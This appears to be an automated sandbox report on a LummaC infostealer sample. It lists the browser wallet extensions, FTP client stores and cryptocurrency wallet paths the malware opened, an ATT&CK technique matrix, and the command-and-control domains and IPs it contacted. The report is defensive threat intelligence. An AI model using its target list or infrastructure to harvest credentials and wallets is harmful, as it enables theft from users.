Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior

Source: Yara match

File source: Process Memory Space: aspnet_regiis.exe PID: 7728, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	13 Virtualization/Sandbox Evasion	LSASS Memory	151 Security Software Discovery	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	13 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
b.exe	26%	ReversingLabs	Win32.Infostealer.Generic
b.exe	30%	Virustotal		Browse
b.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\gdi32.dll	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
frogs-severz.sbs	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://frogs-severz.sbs/api8	0%	Avira URL Cloud	safe
https://revirepart.biz/	100%	Avira URL Cloud	malware
https://frogs-severz.sbs/api	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/J	0%	Avira URL Cloud	safe
https://revirepart.biz/	20%	Virustotal		Browse
https://frogs-severz.sbs/api;	0%	Avira URL Cloud	safe
https://frogs-severz.sbs:443/api	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/.	0%	Avira URL Cloud	safe
https://revirepart.biz/api	100%	Avira URL Cloud	malware
https://frogs-severz.sbs/	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/apibu	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/pp	0%	Avira URL Cloud	safe
https://frogs-severz.sbs:443/apicuriz	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/api$	0%	Avira URL Cloud	safe
https://frogs-severz.sbs/apie	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
frogs-severz.sbs	104.21.88.250	true	true	4%, Virustotal, Browse	unknown
revirepart.biz	104.21.43.198	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://frogs-severz.sbs/api	true	Avira URL Cloud: safe	unknown
https://revirepart.biz/api	true	Avira URL Cloud: malware	unknown
revirepart.biz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/J	aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1877041878.0000000004DA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925594302.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924472463.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://revirepart.biz/	aspnet_regiis.exe, 00000002.00000003.1726420977.00000000028E6000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/api;	aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/api8	aspnet_regiis.exe, 00000002.00000002.1925302467.000000000294F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	aspnet_regiis.exe, 00000002.00000003.1773452170.0000000004E42000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804527241.0000000004DF6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DF6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	aspnet_regiis.exe, 00000002.00000003.1773452170.0000000004E42000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804527241.0000000004DF6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DF6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs:443/api	aspnet_regiis.exe, 00000002.00000003.1924361265.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/	aspnet_regiis.exe, 00000002.00000002.1925207846.0000000002927000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804693049.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804839414.0000000004DA7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1770809655.0000000002937000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1904340370.0000000002927000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804566888.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://frogs-severz.sbs/apibu	aspnet_regiis.exe, 00000002.00000002.1925302467.000000000294F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	aspnet_regiis.exe, 00000002.00000003.1773452170.0000000004E44000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/.	aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850397648.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1877041878.0000000004DA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925594302.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924472463.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850064966.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://frogs-severz.sbs/pp	aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1826659361.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850397648.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1877041878.0000000004DA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925594302.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924472463.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1827760791.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850064966.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://frogs-severz.sbs:443/apicuriz	aspnet_regiis.exe, 00000002.00000003.1924361265.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/api$	aspnet_regiis.exe, 00000002.00000003.1876536133.000000000294F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://frogs-severz.sbs/apie	aspnet_regiis.exe, 00000002.00000003.1826478661.0000000002947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1826429538.0000000002943000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.43.198	revirepart.biz	United States		13335	CLOUDFLARENETUS	false
104.21.88.250	frogs-severz.sbs	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561391
Start date and time:	2024-11-23 10:24:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	b.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/7@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 90% Number of executed functions: 24 Number of non-executed functions: 46
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:25:01	API Interceptor	8x Sleep call for process: aspnet_regiis.exe modified
04:25:22	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.43.198	injector V2.5.exe	Get hash	malicious	LummaC	Browse
	gdi32.dll	Get hash	malicious	LummaC	Browse
	Loader.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
revirepart.biz	injector V2.5.exe	Get hash	malicious	LummaC	Browse	104.21.43.198
	hmjsOnyfSB.dll	Get hash	malicious	LummaC	Browse	172.67.184.174
	modest-menu.exe	Get hash	malicious	LummaC	Browse	172.67.184.174
	gdi32.dll	Get hash	malicious	LummaC	Browse	104.21.43.198
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.43.198
	c2_Acid.exe	Get hash	malicious	LummaC	Browse	172.67.184.174
	XRuncher_2.5.0.6.exe	Get hash	malicious	LummaC	Browse	172.67.184.174
	Jorieh.exe	Get hash	malicious	LummaC	Browse	172.67.184.174
frogs-severz.sbs	file.exe	Get hash	malicious	LummaC Stealer	Browse	193.143.1.19

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	loader.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.44.93
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.67.162.84
	17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
CLOUDFLARENETUS	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	loader.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.44.93
